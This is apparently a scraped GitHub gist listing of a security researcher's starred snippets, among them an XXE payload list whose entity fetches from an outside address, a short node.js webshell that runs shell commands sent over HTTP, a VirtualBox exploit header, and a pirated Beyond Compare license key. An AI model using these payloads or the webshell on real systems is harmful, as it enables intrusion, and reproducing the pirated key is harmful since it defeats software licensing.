Skip to content

Instantly share code, notes, and snippets.

View xinali's full-sized avatar
🎯
Focusing

xina1i xinali

🎯
Focusing
242 followers · 97 following
View GitHub Profile
@saelo
saelo / 3_years_of_attacking_javascript_engines.txt
Created October 27, 2019 16:04
3 Years of Attacking JavaScript Engines
|=-----------------------------------------------------------------------=|
|=-------------=[ 3 Years of Attacking JavaScript Engines ]=-------------=|
|=-----------------------------------------------------------------------=|
|=------------------------------=[ saelo ]=------------------------------=|
|=-----------------------------------------------------------------------=|
The following are some brief notes about the changes that have taken place
since the release of the "Attacking JavaScript Engines" paper [1]. In
general, no big conceptional changes have happened since. Mitigations have
been added to break some of the presented techniques and, as expected, a
@peternguyen93
peternguyen93 / virtualbox_3d_exp.py
Last active October 18, 2019 19:24
# Author : peternguyen93
import sys
sys.path.append('../') # back to vboxlib module
from vboxlib.hgcm import *
from vboxlib.chromium import *
from ctypes import *
'''
@vnsam
vnsam / gist:187be13c408b291f9b9c0a28c72fb7ff
Created October 10, 2017 13:21
Pro version key for Beyond Compare - v4.2.3.22587
This can be used in Mac by using following trick:
Open trial.key at path: /Applications/Beyond\ Compare.app/Contents/Resources/trial.key
Replace content of trial.key with:
--- BEGIN LICENSE KEY ---
H1bJTd2SauPv5Garuaq0Ig43uqq5NJOEw94wxdZTpU-pFB9GmyPk677gJ
vC1Ro6sbAvKR4pVwtxdCfuoZDb6hJ5bVQKqlfihJfSYZt-xVrVU27+0Ja
hFbqTmYskatMTgPyjvv99CF2Te8ec+Ys2SPxyZAF0YwOCNOWmsyqN5y9t
q2Kw2pjoiDs5gIH-uw5U49JzOB6otS7kThBJE-H9A76u4uUvR8DKb+VcB
rWu5qSJGEnbsXNfJdq5L2D8QgRdV-sXHp2A-7j1X2n4WIISvU1V9koIyS
@gravitylow
gravitylow / codesign_gdb.md
Last active March 10, 2025 16:38 — forked from hlissner/codesign_gdb.md
Codesign gdb on macOS

If you are getting this in gdb on macOS while trying to run a program:

Unable to find Mach task port for process-id 57573: (os/kern) failure (0x5).
 (please check gdb is codesigned - see taskgated(8))
  1. Open Keychain Access
  2. In menu, open Keychain Access > Certificate Assistant > Create a certificate
  3. Give it a name (e.g. gdbc)
@averagesecurityguy
averagesecurityguy / pdf_flatedecode.py
Last active October 2, 2024 19:10
Decompress FlateDecode Objects in PDF
#!/usr/bin/env python3
# This script is designed to do one thing and one thing only. It will find each
# of the FlateDecode streams in a PDF document using a regular expression,
# unzip them, and print out the unzipped data. You can do the same in any
# programming language you choose.
#
# This is NOT a generic PDF decoder, if you need a generic PDF decoder, please
# take a look at pdf-parser by Didier Stevens, which is included in Kali linux.
# https://tools.kali.org/forensics/pdf-parser.
#
@herrcore
herrcore / strings.py
Last active July 17, 2020 00:49 — forked from williballenthin/strings.py
Extract ASCII and Unicode strings using Python.
#!/usr/bin/env python
##########################################################################################################
##
## Like steroids for your strings!
##
## Original idea: @williballenthin
## Original link: https://gist.github.com/williballenthin/8e3913358a7996eab9b96bd57fc59df2
##
## Lipstick and rouge by: @herrcore
@staaldraad
staaldraad / XXE_payloads
Last active April 28, 2025 08:46
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@yckart
yckart / LICENSE.txt
Last active March 12, 2025 17:09 — forked from 140bytes/LICENSE.txt
getElementByXPath | Get DOM-Nodes by its XPath.
DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
Version 2, December 2004
Copyright (C) 2013 Yannick Albert <http://yckart.com>
Everyone is permitted to copy and distribute verbatim or modified
copies of this license document, and changing it is allowed as long
as the name is changed.
DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
@khakimov
khakimov / gist:5130151
Created March 10, 2013 19:53
node.js command webshell
var sys = require('sys'),
exec = require('child_process').exec,
child,
http = require('http');
child = function(res, cmd) {
exec(cmd,
function (error, stdout, stderr) {
res.end(stdout);
if (error !== null) {
@evandrix
evandrix / README.md
Created September 11, 2012 00:06
Headless web browsers

Here are a list of headless browsers that I know about:

  • [HtmlUnit][1] - Java. Custom browser engine. JavaScript support/DOM emulated. Open source.
  • [Ghost][2] - Python only. WebKit-based. Full JavaScript support. Open source.
  • [Twill][3] - Python/command line. Custom browser engine. No JavaScript. Open source.
  • [PhantomJS][4] - Command line/all platforms. WebKit-based. Full JavaScript support. Open source.
  • [Awesomium][5] - C++/.Net/all platforms. Chromium-based. Full JavaScript support. Commercial/free.
  • [SimpleBrowser][6] - .Net 4/C#. Custom browser engine. No JavaScript support. Open source.
  • [ZombieJS][7] - Node.js. Custom browser engine. JavaScript support/emulated DOM. Open source.
  • [EnvJS][8] - JavaScript via Java/Rhino. Custom browser engine. JavaScript support/emulated DOM. Open source.